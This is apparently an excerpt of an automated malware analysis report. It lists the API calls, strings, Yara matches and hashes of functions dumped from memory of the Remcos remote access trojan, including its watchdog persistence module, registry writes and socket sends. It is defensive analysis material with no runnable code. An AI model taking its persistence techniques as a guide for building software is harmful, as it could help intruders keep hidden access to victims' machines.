                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                    • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                  • _CxxThrowException.MSVCRT(00000003,00416FB8), ref: 004049E5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000003,00416FB8), ref: 004049F0
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404A0A
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 00404A1C
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A29
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A36
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404A51
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404A7E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404A88
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404A94
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404AC0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404ACA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AF0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AFC
                                  • _CxxThrowException.MSVCRT(00000004,00416FB8), ref: 00404B1C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000004,00416FB8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B27
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404B39
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 00404B56
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404B60
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                    • Part of subcall function 00402440: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024FF
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B81
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404B99
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BA2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BAB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BB4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BBD
                                  • atoi.MSVCRT ref: 00404B88
                                    • Part of subcall function 00404EA7: _EH_prolog.MSVCRT ref: 00404EAC
                                    • Part of subcall function 00404EA7: closesocket.WS2_32(?), ref: 00404EEE
                                    • Part of subcall function 00404EA7: TerminateThread.KERNEL32(?,00000001,00000000,?,00000001,00000001,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 00404F00
                                  • _CxxThrowException.MSVCRT(00000000,00000000), ref: 00404BD6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000,0041B320,00000010,00000000,00000001,00000006), ref: 00404BDE
                                  • atoi.MSVCRT ref: 00404BE5
                                  • FindClose.KERNEL32(?), ref: 00404BF6
                                  • ExitThread.KERNEL32 ref: 00404BFE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$G@std@@$D@2@@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@Hstd@@V?$basic_string@$V10@0@$?begin@?$basic_string@D@2@@0@FindG@2@@0@V01@@$?c_str@?$basic_string@D@1@@ExceptionThrow$?length@?$basic_string@FileV10@wcscmp$?end@?$basic_string@G@1@@$?data@?$basic_string@A?$basic_string@CloseFirstH_prologNextThreadV01@atoisend$??4?$basic_string@?empty@?$basic_string@?find@?$basic_string@ExitTerminateV12@Y?$basic_string@closesocketconnectsocket
                                  • String ID:
                                  • API String ID: 338953085-0
                                  • Opcode ID: 64b6d24a099f49f87b4da525077f38fde3800b06bfc63a19b21d2caf8c47ce30
                                  • Instruction ID: 4b461097a1424462df126d137943af890334f3d1b741e30b480b936ae2585c0a
                                  • Opcode Fuzzy Hash: 64b6d24a099f49f87b4da525077f38fde3800b06bfc63a19b21d2caf8c47ce30
                                  • Instruction Fuzzy Hash: B4C14072800609EBCB11FFA0DC49ADE777CEB54345F0041AAF506A71A1EB745B85CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A5F5, Relevance: 87.7, APIs: 40, Strings: 10, Instructions: 222sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 0040A5FE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,00000000), ref: 0040A611
                                    • Part of subcall function 0040B829: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B836
                                    • Part of subcall function 0040B829: RegSetValueExA.ADVAPI32(?,00000004,00000000,00000004,?,00000004,00000000,?,00409CDD,80000001,00000000), ref: 0040B851
                                    • Part of subcall function 0040B829: RegCloseKey.ADVAPI32(?,?,00409CDD,80000001,00000000), ref: 0040B85C
                                  • OpenMutexA.KERNEL32 ref: 0040A63B
                                  • CloseHandle.KERNEL32(00000000), ref: 0040A64A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Remcos restarted by watchdog!,?), ref: 0040A65E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A68C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A69C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,?), ref: 0040A6B6
                                    • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                    • Part of subcall function 0040B4C8: RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                    • Part of subcall function 0040B4C8: RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0040A6D4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH), ref: 0040A6E2
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                    • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                    • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                    • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                    • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                    • Part of subcall function 0040A8CE: OpenProcess.KERNEL32(00100000,00000000,?,80000001,?,0040A86F), ref: 0040A8DC
                                    • Part of subcall function 0040A8CE: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0040A86F), ref: 0040A8E7
                                    • Part of subcall function 0040A8CE: CloseHandle.KERNEL32(00000000,?,0040A86F), ref: 0040A8EE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?), ref: 0040A7A3
                                  • _wgetenv.MSVCRT ref: 0040A7B3
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A7BE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A7C9
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A7D5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7DE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7E7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog launch failed!,?), ref: 0040A882
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?), ref: 0040A896
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A673
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A709
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A718
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040A72D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?), ref: 0040A748
                                  • _wgetenv.MSVCRT ref: 0040A758
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A763
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A76E
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A77A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A783
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A78C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7F0
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(\svchost.exe), ref: 0040A7FE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041BD70), ref: 0040A80C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040A816
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A837
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A84B
                                  • Sleep.KERNEL32(000007D0), ref: 0040A85E
                                  • CloseHandle.KERNEL32 ref: 0040A8AA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8B6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8BF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@$Hstd@@V?$basic_string@$CloseG@1@@$D@2@@0@Open$HandleProcessV01@V10@0@$??4?$basic_string@G@2@@0@V01@@V10@Value_wgetenv$CreateCurrentLocalMutexObjectQuerySingleSleepTimeV10@@WaitY?$basic_string@printf
                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[INFO]$\SysWOW64$\svchost.exe$\system32
                                  • API String ID: 2208868093-2207663338
                                  • Opcode ID: 9091c6b63f88cba4044878423eae5b724ce617bbc0aba149de81e8580702b54f
                                  • Instruction ID: 260755ff1fe0d3a0fcb30184a4449815193b010e4943e9dd02dd017fae915b1e
                                  • Opcode Fuzzy Hash: 9091c6b63f88cba4044878423eae5b724ce617bbc0aba149de81e8580702b54f
                                  • Instruction Fuzzy Hash: 82714272910509EFDB04BBE0EC4A9EE7B3CEF54345F404036F912A2191EB795985CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410586, Relevance: 78.3, APIs: 52, Instructions: 279fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00410595
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 004105AD
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004105BE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004105CD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,00000000,00000001), ref: 00410617
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000001), ref: 00410624
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041062F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041063B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410648
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410655
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,00000000,00000001), ref: 00410679
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000,00000001), ref: 0041068B
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 00410694
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106A9
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106B3
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,?,?,?,00000000,00000001), ref: 004106D0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004106DC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000000,0041B310,00000000,00000002,0041B310,?), ref: 00410713
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00410720
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00410730
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 00410740
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00410750
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0041075A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000005E), ref: 00410774
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410780
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041078C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410795
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041079E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107A7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107B0
